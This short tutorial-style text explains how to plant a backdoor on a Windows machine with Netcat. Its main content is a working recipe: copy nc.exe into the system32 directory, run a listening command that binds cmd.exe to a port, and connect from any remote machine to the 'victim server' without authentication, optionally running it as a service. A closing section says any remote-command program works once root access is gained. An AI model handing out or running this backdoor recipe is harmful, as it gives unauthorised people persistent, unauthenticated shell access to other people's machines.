Many people think of Netcat as the Swiss army knife of TCP/IP. Although often used for nefarious purposes, Netcat can also be used for good. Using Netcat we can easily create a backdoor to any machine running Windows. All you have to do is perform the following steps:
- Download Netcat for Windows.
- Unzip nc.exe to the %SYSTEMROOT%\system32 directory.
- # Execute nc -d -L -e cmd.exe -p 10001. Change 10001 to which ever port you wish.
- From any remote machine accessible to the victim server — you can now telnet to the server on port 10001 — telnet X.X.X.X 10001 — without any authentication.
NOTE: As soon as you disconnect Netcat will stop running. Alternatively, you could also run it as a service.
Netcat is an excellent tool but is all too often used maliciously. Virus software often reports Netcat as a threat.
The Universal Way
How to create a back door on any OS:
- Get root/administrator access.
- Install any program that lets you run commands remotely.